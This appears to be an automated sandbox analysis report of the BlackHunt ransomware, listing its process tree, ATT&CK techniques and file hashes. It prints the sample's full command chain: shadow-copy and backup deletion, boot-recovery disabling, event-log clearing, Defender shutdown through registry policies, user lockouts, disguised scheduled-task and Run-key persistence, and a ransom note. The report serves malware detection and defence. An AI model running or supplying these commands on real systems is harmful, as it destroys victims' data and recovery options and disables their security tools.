- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1144 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:740
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:5128
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1612
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:8560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3528
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:12452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:5084
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:12440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:4440
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:11244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5204
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:13164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5260
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5188
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5168
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:316
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2188
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1136
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2240
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:4860
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe" /F2⤵PID:3672
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1560
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:3988
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4700
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:5044
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3364
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:5112
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4812
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2748
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2724
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:60
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4720
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2352
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3188
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1836
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2184
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:3872
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:4368
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:3660
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2628
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:1692
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1176
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1128
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1460
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4300
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3036
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:5104
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵PID:6836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:6296
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
PID:5808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4672
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:13008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2976 -
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:6604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:6888
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:3004
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe"2⤵PID:6256
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:5172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:6300
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:6288
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:5164
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:11076
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:11136
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:6996
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:9872
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:9548
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:9516
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:9108
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:6684
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:4324
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:4460
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:10136
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:10040
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:8932
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:10760
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f1⤵
- Modifies registry class
PID:4740
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:4924
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:8568
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:11272
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:11028
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:8552
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:6592
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:12460
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:12444
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:6616
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:10732
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:9316
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:10924
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe" /F1⤵
- Creates scheduled task(s)
PID:11284
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:7548
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:10908
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:12304
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:10680
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:10856
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:10436
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:6212
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:8976
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:6448
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:912
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:12424
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:10492
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:10452
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:6108
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:7580
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:5008
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:1128
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Modifies registry class
PID:1876
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:4760
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵PID:2976
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:3484
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵
- Adds Run key to start application
PID:3232
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:3904
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2220
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:3484
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
PID:10232
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:11664
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
PID:11272
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:6020
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:10380
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:12216
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt1⤵PID:1984
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵PID:11964
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11964 -s 14562⤵
- Program crash
PID:232
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f1⤵PID:6452
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:5728
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f1⤵PID:6364
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
PID:12436
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:10464
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 11964 -ip 119641⤵PID:8240
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
PID:9028
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
PID:9880
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:468
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵PID:12424
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5dec7b0511f56601ee5d63c9d3b5b92db
SHA15f8cd7a0df79ec9b15653b8a8961fdd6a1ff4611
SHA2563d7b7bef51e8456a33b1304efdf31bb3a13f1d9dd82a8f56abb57146cb875742
SHA5124296be7fea4f4cebac455a0513e85ce2ea5347d041c6c8379eda02938894a0f44c302834374b693219826a2ce17f765ee3bf0424a878b8d3e1a099ff26e1d341
-
Filesize
12KB
MD577bce56ca62bb362715d826ce5483f8d
SHA19df9e59c2d727679db4c000e27b5d9cb081d417d
SHA25645aef0aaf25be6071cf6c0a79d2763c60ed4bcb71fdd98d7f615a3156eaec208
SHA51260b71742cb03296df7927c943c45937521ee5838009aecfdc67bb05bc5ecc7252247c95dc0e0e0c44ddd3463a3f0b0b2be74b9fbe6d2decb184b34e441f0cc16
-
Filesize
1KB
MD59491c3d7dffa386fe7f4e8723d0e9ab6
SHA116c28f5af4cc795601940e241a68528b09f68c1a
SHA25621cffd8e46a3205bf273e1974a6bc5ecf82efd6ce91f947435dfd20a707f5056
SHA51246e842a6120674d0eafa6ea7ee3d809d6cafc6990ced800ba86b0fa0b7a12eb830b6628ef5b8ed8fb0dc5cd37ef77563251bfaf2b8e7432da3168ee6e9ad1f0f
-
Filesize
684B
MD5a44432bcea79f953023fbc52fb631d30
SHA1b745764899f6dc59bc34a30a33a5c9a6faf2be5b
SHA256abe6a0415916c45273a3efcfab118ddfbf2d14728284a9de76c683df4ffbfff0
SHA512a5db652671aaec4630be0509b2893f7b54aa7e622fc1a24a7a9ff0545e45b1c9e781bb01e2ab7a23a826720c35918f13282717b82635a9a08001d3877a0d8d81